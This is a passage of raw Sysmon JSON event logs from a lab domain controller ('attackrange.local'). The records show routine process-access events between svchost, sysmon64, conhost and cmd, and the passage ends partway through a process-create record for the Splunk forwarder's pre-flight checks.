{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EF890500}\r\nTargetProcessId: 92\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EF890500}","TargetProcessId":"92","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.537\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nProcessId: 3828\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 